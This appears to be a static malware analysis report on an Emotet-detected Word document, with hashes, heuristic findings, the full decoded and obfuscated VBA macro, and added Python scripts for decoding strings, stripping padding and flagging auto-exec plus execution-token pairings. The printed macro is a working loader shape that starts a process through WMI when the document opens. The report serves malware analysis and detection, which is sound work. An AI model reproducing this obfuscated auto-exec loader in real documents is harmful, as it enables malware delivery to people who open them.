Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd67e1857d544593…

MALICIOUS

Office (OLE)

Size: 186.8 KB
Created: 2019-12-16 10:56:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: 827db45b7294927cb624b3e0a9c55b4f
SHA-1: 1bf5aaba94834e8af2731c664ac4248f14325acf
SHA-256: fd67e1857d544593af51f51a68a13823223e7eb067b351e9ccaae429862227f1
Risk score: 272

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-7458509-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458509-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. For this sample the decoded source was recovered, so the pairing is also visible directly in the preview below: the Document_open entry point together with the CreateObject and GetObject calls.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace identifier that Office writes into its own parts; it is not an attacker-supplied address and should not be treated as an indicator of compromise.
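The two heuristics above that carry the most weight are the Split/Join string reconstruction (OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER) and the auto-exec plus execution-token pairing (OLE_VBA_PCODE_AUTOEXEC_EXEC). The following Python is an added example, not part of this report or the tooling that produced it: it recovers the string the matched Join(Split(...)) line assembles and re-implements the pairing rule so the "neither token alone fires" property can be checked. The VBA excerpt is constructed from the lines the report quotes; the TextBox value Wpcelcnm.Tkeunwzdjusza is not on the page, so the decoder emits a placeholder for it rather than guessing. The benign macro is likewise constructed.

```python
"""Added example, not part of the report or its tooling. It (1) recovers the
string the matched Join(Split(...)) line assembles and (2) re-implements the
auto-exec + execution-token pairing rule so the 'neither token alone fires'
property can be checked. The VBA excerpt is constructed from the lines the
report quotes; the TextBox value Wpcelcnm.Tkeunwzdjusza is not on the page,
so the decoder emits a placeholder for it instead of guessing."""
import re

# Constructed excerpt: the matched lines quoted in the report, nothing else.
SAMPLE_VBA = r'''
Private Sub Document_open()
Sjjfkjzcfls
End Sub
Function Sjjfkjzcfls()
Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
End Function
'''

# Constructed benign macro: an auto-exec entry point with no execution token.
BENIGN_VBA = '''
Private Sub Document_Open()
MsgBox "hello"
End Sub
'''

JOIN_SPLIT = re.compile(
    r'Join\(Split\("(?P<blob>[^"]*)",\s*"(?P<sep>[^"]*)"\),\s*"(?P<glue>[^"]*)"\)',
    re.IGNORECASE)
TAIL_PIECE = re.compile(r'\+\s*("[^"]*"|[\w.]+)')


def vba_join_split(blob, sep, glue):
    """VBA Split() on a non-empty delimiter followed by Join(): Python's
    str.split/str.join give the same result, empty edge pieces included."""
    return glue.join(blob.split(sep))


def decode_join_split(src):
    """Map each `X = Join(Split("blob", "sep"), "glue") + ...` assignment to
    its decoded value. Literal `+ "..."` tails are appended; `+ Form.Control`
    tails become `<form:Form.Control>` placeholders because the UserForm
    property values are not present in the source text."""
    decoded = {}
    for line in src.splitlines():
        m = JOIN_SPLIT.search(line)
        if not m:
            continue
        lhs = line[:m.start()].strip().rstrip('=').strip()
        value = vba_join_split(m['blob'], m['sep'], m['glue'])
        for piece in TAIL_PIECE.findall(line[m.end():]):
            value += piece[1:-1] if piece.startswith('"') else f'<form:{piece}>'
        decoded[lhs] = value
    return decoded


AUTOEXEC = ('Auto_Open', 'AutoOpen', 'Document_Open', 'Workbook_Open',
            'Auto_Close', 'AutoClose')
EXEC_TOKENS = ('Shell', 'CreateObject', 'GetObject', 'PowerShell', 'cmd.exe',
               'URLDownloadToFile', 'WinHttp', 'XMLHTTP', 'ADODB.Stream',
               'ShellExecute', 'ExecuteExcel4Macro')


def _present(tokens, text):
    # VBA is case-insensitive. Word boundaries stop 'Shell' matching inside
    # 'ShellExecute' (which has its own entry) but still match 'WScript.Shell'.
    return [t for t in tokens
            if re.search(r'\b' + re.escape(t) + r'\b', text, re.IGNORECASE)]


def autoexec_exec_pairing(text):
    """Fire only when an auto-exec entry point AND an execution token both
    occur in the same text (decoded source, or a p-code/cache stream dumped
    as strings). Returns (fired, matched_autoexec, matched_exec)."""
    auto, ex = _present(AUTOEXEC, text), _present(EXEC_TOKENS, text)
    return bool(auto) and bool(ex), auto, ex


if __name__ == '__main__':
    for name, value in decode_join_split(SAMPLE_VBA).items():
        print(f'{name} = {value!r}')
    print(autoexec_exec_pairing(SAMPLE_VBA))
    print(autoexec_exec_pairing(BENIGN_VBA))
```

Run as-is, the decoder yields `winmgmts:Win32_<form:Wpcelcnm.Tkeunwzdjusza>rocess`, and the pairing check fires on the sample but not on the benign macro, which has the entry point and nothing else. Two observations that follow from the preview rather than from the report's own findings: INSN is never assigned anywhere in the decoded source, so with no Option Explicit it is Empty and `INSN & Moplwywfs` is just the decoded string; and if the hidden TextBox holds a single `P` (an assumption, the value is not on the page) the moniker is `winmgmts:Win32_Process`, which would fit the later `Vbgbcjlczlvy.Create(...)` call taking the four arguments of Win32_Process.Create (CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId) and the XSize/YSize assignments on the CreateObject result, both of which are Win32_ProcessStartup properties. Treat that as an analyst inference until the UserForm property values are dumped from the form stream.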

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8224 bytes
SHA-256: 103cc589812bba8725f1d32621b0b7a0c70b003d2aeb5b7f3647bb15e82003c0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
206 of 309 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Wpcelcnm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Tkeunwzdjusza, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Vkfpqytfyyrsu
      Dim Yybnowzai
      For Sjfskvhxnyrhb = Csdnbnzqmoun To 0
         Wfmshbyurpprl = xPI
         Jwsugkzgnwkwn = CDbl(3)
         Qacpaunqp = Tan(MyeW5A)
         Ondvdvurouoh = 4 - Wyzwxelkjyp
         Cbwfcynvldrtp = (3 - Vnbtyadvousr)
         Eegnysps = Iqtkvhchcp
         Wvqwyghlkherh = CDbl(6)
         Fqjgdypkih = Tan(Hrkpsphikxbui)
      Next
      Dim Epygvdyqpas
      Dim Viklcxhl
      For Fquwlfizdcy = Csdnbnzqmoun To 0
         Lvmvamrvwabr = xPI
         Hynceiatpbhn = CDbl(3)
         Bpzcxnzqq = Tan(MyeW5A)
         Yetiqsebm = 4 - Patpurfk
         Bkthbzuwtqi = (3 - Gdhlzjclzfaz)
         Ithkfntxuz = Tkesksdfnlm
         Bmbcesicq = CDbl(6)
         Mgczbijh = Tan(Prhhvivtuw)
      Next
      Dim Bntqswtftvfud
      Dim Nndktfjbfq
      For Vzovyivelg = Csdnbnzqmoun To 0
         Jkbpjpgo = xPI
         Dtbvfsslna = CDbl(3)
         Ygfzgmiozg = Tan(MyeW5A)
         Bjdtspkkwlvut = 4 - Dlzsplwm
         Jiugyjwuct = (3 - Ytxpipmklgd)
         Daniofxik = Qexczzrjh
         Fuacgakydfk = CDbl(6)
         Jimnoyfolqzes = Tan(Lotcpqvsil)
      Next
Sjjfkjzcfls
End Sub

Attribute VB_Name = "Xrfpydxbfk"
Attribute VB_Base = "0{E8D6A6C6-2BAF-4D05-B16A-00A79C17EEA2}{A3253E34-5D61-4D49-B0EB-C485ED4777B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ueqdsoufggvs"
Function Elbvfewbxtip()
      Dim Yzdqenohomavo
      Dim Iepyxmulumis
      For Vmzarkiv = Csdnbnzqmoun To 0
         Chihsaonym = xPI
         Zqkjenjdvuce = CDbl(3)
         Bvxvmmwc = Tan(MyeW5A)
         Ensuyvuajdm = 4 - Hgumfqhfens
         Qcahvxuueruo = (3 - Abupnrep)
         Zrlojazaveer = Ipovcpzy
         Hdjyfgoanih = CDbl(6)
         Gkesutavic = Tan(Xdjnzsbqv)
      Next
Otuzexnwdaa = Wpcelcnm.Tkeunwzdjusza
      Dim Ojhymdixps
      Dim Gnuzzpljoe
      For Cvjxaxnniyya = Csdnbnzqmoun To 0
         Cwgszqfzzrfq = xPI
         Fjyjypwru = CDbl(3)
         Semeiotwhmodv = Tan(MyeW5A)
         Mcvsrjtjiyzo = 4 - Vlcuvhmsvqc
         Wrqgcedcuvbt = (3 - Vefjaqilblizy)
         Gepfowrrswkz = Paahiroq
         Vmlqfxcg = CDbl(6)
         Orlozcdnmm = Tan(Xklkhspqfqw)
      Next
Fbkkbllyh = Otuzexnwdaa + Xrfpydxbfk.Xqydzwclglloa + Xrfpydxbfk.Auittfls + Xrfpydxbfk.Tbqpogqafxre
      Dim Yuagbzltvajh
      Dim Mizowiiepx
      For Eaxdnthdtkig = Csdnbnzqmoun To 0
         Dkvfcheqzvadx = xPI
         Tfcliulwrn = CDbl(3)
         Cqczsqxf = Tan(MyeW5A)
         Junoobcdjv = 4 - Zeguoeroesmh
         Wvhnzolkwixug = (3 - Oduniqxtybto)
         Qhgmoegww = Ioixwuyhuposu
         Ybjlgadgfa = CDbl(6)
         Rfnsgzozc = Tan(Bhvgnobpmtfgf)
      Next
Wohzgfledt = Fbkkbllyh + Xrfpydxbfk.Scueqyzrze + Xrfpydxbfk.Dakwruximp
      Dim Ixpjzknxpm
      Dim Zohlddmlvy
      For Gzgosznz = Csdnbnzqmoun To 0
         Yfphqoydhiaq = xPI
         Bdwikvqkeocae = CDbl(3)
         Pzdrfqbww = Tan(MyeW5A)
         Mrqlapghnoceo = 4 - Nbaeqkzy
         Xzmizhavmj = (3 - Sontwmrnupvc)
         Vrwnntyccquzn = Icmetimr
         Mgenidkfami = CDbl(6)
         Vfvqlwzwzkklm = Tan(Jqjazzamtounj)
      Next
Elbvfewbxtip = Aqtjfpyvasena + Wohzgfledt + Aqtjfpyvasena
      Dim Xrhcbprq
      Dim Jyfsevqpi
      For Utljxmnqhmqx = Csdnbnzqmoun To 0
         Noeuarvois = xPI
         Hhhyvdtjdxwse = CDbl(3)
         Alssbwgqg = Tan(MyeW5A)
         Iiyfktbzffij = 4 - Dzipslqxmud
         Gbaqblbvlkxmc = (3 - Xzrbbfxwx)
         Adkwdcutuyf = Xqrspldqu
         Mcboujecpnlxk = CDbl(6)
         Usjwgslke = Tan(Ehmyxgsljab)
      Next
End Function
Function Sjjfkjzcfls()
      Dim Xxpjresegnje
      Dim Uxptvvnt
      For Srdvqcclwlbfi = Csdnbnzqmoun To 0
         Izmhowfbb = xPI
         Phavidrrrzbxo = CDbl(3)
         Xinbppbnnw = Tan(MyeW5A)
         Qbmqcqsmvl = 4 - Yorwfhcx
         Zxnzpiot = (3 - Hrapeizgvrpli)
         Byehgudi = Pdcakybz
         Gnbrxhvcmonp = CDbl(6)
         Ojjmgeejnnpfx = Tan(Somgownxmk)
      Next
Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
      Dim Bmcmitvtkrlw
      Dim Jwklhskoevv
      For Pdlwftscylfe = Csdnbnzqmoun To 0
         Tzsdrpfljgqaf = xPI
         Hhqbyfpyufc = CDbl(3)
         Kkegovqols = Tan(MyeW5A)
         Qdtfgenkoreo = 4 - Qdayxoltazbj
         Rzvpmiibwt = (3 - Otwtgqcu)
         Nnuphwcudw = Tpwpcvmo
         Kwarxhslg = CDbl(6)
         Emhuxblzb = Tan(Hkzhwrnhiqf)
      Next
Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
      Dim Cdolanzswn
      Dim Etxcjnatizy
      For Vpsupawpw = Csdnbnzqmoun To 0
         Fftxremlpsirj = xPI
         Vcnddfdfex = CDbl(3)
         Hmkzimaxeuccd = Tan(MyeW5A)
         Vnnxidffub = 4 - Rcaoakge
         Szfjtebzl = (3 - Shrrayubgqx)
         Iuefcrxhnq = Szjaduqtmzv
         Zmmdsovkwazav = CDbl(6)
         Cjeqwdhykacw = Tan(Wjyvicfkevczc)
      Next
Jlpbkzpfo = Moplwywfs + Xrfpydxbfk.Gvdfelhh.ControlTipText + Xrfpydxbfk.Ojywqtmxik.ControlTipText
      Dim Wicddkmosr
      Dim Wcgtdauxechzl
      For Gpdabytlpw = Csdnbnzqmoun To 0
         Ffrwkyvxzbn = xPI
         Azeubcrmz = CDbl(3)
         Oqcbcrqxwmpsm = Tan(MyeW5A)
         Bqtlebetazpro = 4 - Cfzshtvuvhl
         Vlhsoebb = (3 - Bxkwcbmacdg)
         Stycgwydtl = Osxdjsojqyvxx
         Ihimvlboypbv = CDbl(6)
         Kiliyojpxsls = Tan(Tyafneqwkyfm)
      Next
Rbdwrrto = Jlpbkzpfo + Wpcelcnm.Tkeunwzdjusza
      Dim Zefdcpajxyr
      Dim Yzawjryueuwkq
      For Dipnuwqeg = Csdnbnzqmoun To 0
         Hndfcjpfpuy = xPI
         Tfuujismg = CDbl(3)
         Oidrcivui = Tan(MyeW5A)
         Lrzrmvkume = 4 - Uobvuxvea
         Qtgycgzeqpjud = (3 - Wwblfbfbjcam)
         Mojqtixgxhnna = Ltyacazcpovl
         Vbuyhdazejnup = CDbl(6)
         Ysbljyicmywn = Tan(Bywfkbftosqs)
      Next
Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
      Dim Bxgutsihtr
      Dim Mggkcyfliros
      For Cvucehyu = Csdnbnzqmoun To 0
         Wcyntnsaljf = xPI
         Bgkuqbjiod = CDbl(3)
         Mmrnswsbqna = Tan(MyeW5A)
         Rvznghyyjtvt = 4 - Svghzjxha
         Tnmcwngkczf = (3 - Ivqqdtwteozg)
         Aqujuyant = Ngojlimklzdtg
         Etoymwmhf = CDbl(6)
         Plluubeuq = Tan(Ktgmvxgxw)
      Next
Sjjfkjzcfls.XSize = False
      Dim Oehznrqrd
      Dim Qefwcpzeedg
      For Rawltocj = Csdnbnzqmoun To 0
         Ktezmztraqntq = xPI
         Vpwjzchrfhmu = CDbl(3)
         Pphqivdyqnekl = Tan(MyeW5A)
         Oxjrsxyfzztcc = 4 - Zfptkbgdijqx
         Foqbtqkddm = (3 - Jhqosbzynzv)
         Viuahcaywukcb = Gwbcstsym
         Oxawftyfyiq = CDbl(6)
         Kasmnflrsrsry = Tan(Ccjhgqnd)
      Next
Sjjfkjzcfls.YSize = False
      Dim Aybgwpgadsr
      Dim Bvsszuhn
      For Liymejjnt = Csdnbnzqmoun To 0
         Spxbbjnudav = xPI
         Cruohsqbgtqxy = CDbl(3)
         Qufxbkjg = Tan(MyeW5A)
         Ylutrepmykn = 4 - Fadomvhdchld
         Xuotlzxihwip = (3 - Lzrpbazw)
         Wknmweipijrrk = Owwthgxg
         Cpwcivbwswam = CDbl(6)
         Cnsgfiupzn = Tan(Cdqpzdgu)
      Next
Do While Vbgbcjlczlvy.Create(Null & Elbvfewbxtip, Xhghpojzzvolx, Sjjfkjzcfls, Xvfdlnnoqsfoz)
Loop
      Dim Pmwfnzljaouwt
      Dim Xgntzlhginv
      For Eszqdyqlgs = Csdnbnzqmoun To 0
         Heojjacglucvr = xPI
         Igorszbfio = CDbl(3)
         Uueqnhwrgswz = Tan(MyeW5A)
         Uyjqeywlifsb = 4 - Fyguehhlgdonv
         Pjoezfdws = (3 - Vjmzymuzm)
         Cufkirfbqd = Svdxosbco
         Lyzhfctvcydhu = CDbl(6)
         Wmqqtbndtdu = Tan(Glfxsvumj)
      Next
End Function
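Two things about the preview above are worth turning into repeatable checks: every real statement in Sjjfkjzcfls is wrapped in `Dim` filler and `For X = Csdnbnzqmoun To 0 ... Next` loops whose bodies assign to variables nothing else reads, and the "206 of 309 identifiers look randomly generated" finding in the artifact table. The Python below is an added example, not part of this report or its tooling. `strip_padding()` removes the filler and reports any variable assigned inside a dropped loop that a surviving line still references, so a loop that is not actually dead is flagged rather than silently lost; `random_identifier_ratio()` scores identifiers with a vowel-ratio and consonant-run heuristic whose thresholds are my own choice (an assumption, the report does not state its method). The excerpt is constructed from lines of the preview with each padding loop cut down to one or two body lines.

```python
"""Added example, not part of the report or its tooling. Two triage passes
over decoded VBA shaped like the preview:
  strip_padding()           drops bare Dim filler and the
                            `For X = Csdnbnzqmoun To 0 ... Next` padding loops,
                            leaving the loader skeleton, and reports leaks;
  random_identifier_ratio() counts identifiers that look machine-generated.
looks_random() thresholds are an assumption of this example, not the
report's method. SAMPLE_VBA is constructed from preview lines with the
padding loops shortened."""
import re

SAMPLE_VBA = '''Function Sjjfkjzcfls()
      Dim Xxpjresegnje
      Dim Uxptvvnt
      For Srdvqcclwlbfi = Csdnbnzqmoun To 0
         Izmhowfbb = xPI
         Xinbppbnnw = Tan(MyeW5A)
      Next
Moplwywfs = Join(Split("qwh_h2bdw", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
      For Pdlwftscylfe = Csdnbnzqmoun To 0
         Kwarxhslg = CDbl(6)
      Next
Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
Sjjfkjzcfls.XSize = False
Do While Vbgbcjlczlvy.Create(Null & Elbvfewbxtip, Xhghpojzzvolx, Sjjfkjzcfls, Xvfdlnnoqsfoz)
Loop
End Function
'''

# `For <counter> = <var> To 0`: with no Option Explicit and <var> never
# assigned (true of Csdnbnzqmoun throughout the preview) the bound is
# Empty -> 0, so the body runs exactly once. Whether that body matters is
# checked afterwards via the leak list rather than assumed.
PAD_LOOP = re.compile(r'^For\s+\w+\s*=\s*\w+\s+To\s+0$', re.IGNORECASE)
BARE_DIM = re.compile(r'^Dim\s+\w+$', re.IGNORECASE)
ASSIGN = re.compile(r'^(\w+)\s*=')


def strip_padding(src):
    """Return (kept_lines, leaked). kept_lines is the source without the
    padding; leaked lists variables assigned inside a dropped loop that a
    kept line still references. A non-empty leaked list means a loop was
    not dead and the stripped view must not be trusted as-is."""
    kept, assigned, depth = [], set(), 0
    for raw in src.splitlines():
        s = raw.strip()
        if PAD_LOOP.match(s):
            depth += 1
            continue
        if depth:
            if s.lower() == 'next':
                depth -= 1
            else:
                m = ASSIGN.match(s)
                if m:
                    assigned.add(m.group(1))
            continue
        if not s or BARE_DIM.match(s):
            continue
        kept.append(s)
    body = '\n'.join(kept)
    leaked = sorted(v for v in assigned
                    if re.search(r'\b' + re.escape(v) + r'\b', body, re.IGNORECASE))
    return kept, leaked


VOWELS = set('aeiouy')
KEYWORDS = {'function', 'sub', 'private', 'end', 'dim', 'for', 'to', 'next',
            'set', 'do', 'while', 'loop', 'true', 'false', 'null', 'and', 'or'}


def looks_random(name):
    """Assumed heuristic: 8+ letters with under 25% vowels, or a run of 5+
    consonants. CreateObject and Document_open pass; Sjjfkjzcfls does not."""
    letters = ''.join(c for c in name.lower() if c.isalpha())
    if len(letters) < 8:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    longest_run = max((len(r) for r in re.findall(r'[^aeiouy]+', letters)), default=0)
    return vowel_ratio < 0.25 or longest_run >= 5


def random_identifier_ratio(src):
    """Count identifiers outside string literals and keywords.
    Returns (flagged_count, total_count, flagged_names)."""
    code = re.sub(r'"[^"]*"', '""', src)   # blank out string literals first
    names = {n for n in re.findall(r'\b[A-Za-z_]\w*\b', code)
             if n.lower() not in KEYWORDS}
    flagged = sorted(n for n in names if looks_random(n))
    return len(flagged), len(names), flagged


if __name__ == '__main__':
    kept, leaked = strip_padding(SAMPLE_VBA)
    print('\n'.join(kept))
    print('leaked from dropped loops:', leaked)
    n, total, _ = random_identifier_ratio(SAMPLE_VBA)
    print(f'random-looking identifiers: {n} of {total}')
```

On the constructed excerpt the stripped view is eight lines: the function header, the Split/Join assignment, the two object creations, the XSize assignment, the Do While ... Create loop and the End Function, which is the whole loader. The leak check is the part worth keeping when this is pointed at a different sample: a family that reuses a loop-body variable later would otherwise have its real logic deleted along with the padding. The identifier score is only a shape check; an English-looking mangled name such as Elbvfewbxtip slips under these thresholds, which is why the report gives a ratio rather than a verdict.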